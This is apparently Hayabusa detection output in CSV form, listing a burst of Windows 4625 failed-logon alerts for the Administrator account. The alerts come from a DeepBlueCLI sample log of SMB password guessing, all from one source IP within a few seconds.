2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
